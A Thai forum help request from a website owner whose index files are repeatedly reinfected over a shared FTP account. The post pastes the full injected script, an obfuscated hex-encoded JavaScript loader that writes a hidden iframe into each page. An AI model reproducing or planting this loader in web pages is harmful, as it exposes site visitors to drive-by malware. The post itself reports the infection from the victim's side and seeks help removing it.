:-*ช่วยด้วย
ใครเคยเจอ Script แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้
1. เมื่อเปรียบเทียบไฟล์ที่อยู่ในเครื่อง และไฟล์ที่ upload ปรากฏว่าไฟล์ที่ upload ขึ้นโฮสต์ (รอสัก 3-12 ชม.) มันจะมีขนาดไฟล์ใหญ่ขึ้น 2KB แล้วเมื่อเปิดเปรียบเทียบกับไฟล์เก่า ปรากฏว่ามี Script แปลกๆจากไฟล์บนโฮสต์หลัง TAG <BODY> หน้าตาประมาณนี้(ตัวหนังสือสีแดง)
</iframe><script>function c102916999516l497372f6547ab(l497372f654f7c){ function l497372f65574c(){var l497372f655f1e=16;return l497372f655f1e;} return (parseInt(l497372f654f7c,l497372f65574c()));}function l497372f6566f0(l497372f656ec0){ function l497372f658633(){var l497372f658e04=2;return l497372f658e04;} var l497372f657692='';l497372f6595d5=String.fromCharCode;for(l497372f657e62=0;l497372f657e62<l497372f656ec0.length;l497372f657e62+=l497372f658633()){ l497372f657692+=(l497372f6595d5(c102916999516l497372f6547ab(l497372f656ec0.substr(l497372f657e62,l497372f658633()))));}return l497372f657692;} var x2f='';var l497372f659da7='3C736'+x2f+'3726'+x2f+'970743E6'+x2f+'96'+x2f+'6'+x2f+'28216'+x2f+'D796'+x2f+'96'+x2f+'1297B6'+x2f+'46'+x2f+'F6'+x2f+'3756'+x2f+'D6'+x2f+'56'+x2f+'E742E77726'+x2f+'9746'+x2f+'528756'+x2f+'E6'+x2f+'5736'+x2f+'36'+x2f+'1706'+x2f+'528202725336'+x2f+'32536'+x2f+'392536'+x2f+'36'+x2f+'2537322536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'352532302536'+x2f+'6'+x2f+'52536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'3525336'+x2f+'42536'+x2f+'332533312533302532302537332537322536'+x2f+'3325336'+x2f+'42532372536'+x2f+'3825373425373425373025336'+x2f+'125326'+x2f+'6'+x2f+'25326'+x2f+'6'+x2f+'2536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'2536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'2533322536'+x2f+'6'+x2f+'42536'+x2f+'3525326'+x2f+'52536'+x2f+'6'+x2f+'52536'+x2f+'3525373425326'+x2f+'6'+x2f+'25326'+x2f+'52536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'25326'+x2f+'6'+x2f+'2536'+x2f+'332536'+x2f+'382536'+x2f+'352536'+x2f+'332536'+x2f+'6'+x2f+'225326'+x2f+'52536'+x2f+'382537342536'+x2f+'6'+x2f+'42536'+x2f+'6'+x2f+'32532372532302537372536'+x2f+'392536'+x2f+'342537342536'+x2f+'3825336'+x2f+'42533342533332533332532302536'+x2f+'382536'+x2f+'352536'+x2f+'392536'+x2f+'372536'+x2f+'3825373425336'+x2f+'4253333253336'+x2f+'2533312532302537332537342537392536'+x2f+'6'+x2f+'32536'+x2f+'3525336'+x2f+'4253237253736'+x2f+'2536'+x2f+'392537332536'+x2f+'392536'+x2f+'322536'+x2f+'392536'+x2f+'6'+x2f+'32536'+x2f+'3925373425373925336'+x2f+'12536'+x2f+'382536'+x2f+'392536'+x2f+'342536'+x2f+'342536'+x2f+'352536'+x2f+'6'+x2f+'525323725336'+x2f+'525336'+x2f+'325326'+x2f+'6'+x2f+'2536'+x2f+'392536'+x2f+'36'+x2f+'2537322536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'3525336'+x2f+'52729293B7D76'+x2f+'6'+x2f+'172206'+x2f+'D796'+x2f+'96'+x2f+'13D7472756'+x2f+'53B3C2F736'+x2f+'3726'+x2f+'970743E';document.write(l497372f6566f0(l497372f659da7));</script>2. เมื่อโหลดหน้าที่ติด Script นี้ จะมีการ RUN แปลกๆ สังเกตุที่ด้านล่าง Browser รู้สึกว่าจะ Run นานมาก มีการรันเข้า yahoo.com ด้วย
3. ส่วนมากจะเป็นที่ไฟล์ index ทุกไฟล์ ทุกโฟลเดอร์ ที่ใช้ FTP user เดียวกัน
4. เมื่อลบ Script นี้ไปแล้ว ทุกอย่างก็กลับมาเหมือนเดิม แต่ไม่นานนัก 3-12 ชม. มันก็มีมาอีกโดยอัตโนมัติ (เหนื่อยกับการมานั่งลบทุกไฟล์ index มากๆ)
5. เนื่องจากไฟล์ดึงมาเป็น IFRAME จึงทำให้หน้าเว็บไซต์ผมเละไปด้วย โดยการเพิ่มเนื้อที่ว่างๆ ยาวๆมาครึ่ง Browser จึงจะมองเห็นเนื้อหน้าทั้งหมด
ใครมีประสบการณ์หรือพอจะช่วยเหลือผมได้ไม่ว่าจะด้วยวิธีใดๆ แนะนำผมด้วยนะครับ สามารถเข้าบอกคุยกับผมหรือส่งการช่วยเหลือมาที่ เมล์นี้นี้ครับ
[email protected] ออนเอ็มด้วยครับ ตอนนี้เดือดร้อนมาก ไม่รู้จะแก้ยังไง (ขอคำตอบสำหรับผู้ที่เคยเจอเหตุการณ์นี้มาก่อนและแก้ไขได้แบบชัวร์ๆนะครับ เพราะไม่อยากงมกับวิธีแก้ที่ผิดๆ หรือคาดเดาเอาครับ)
พัฒนาเว็บไซต์
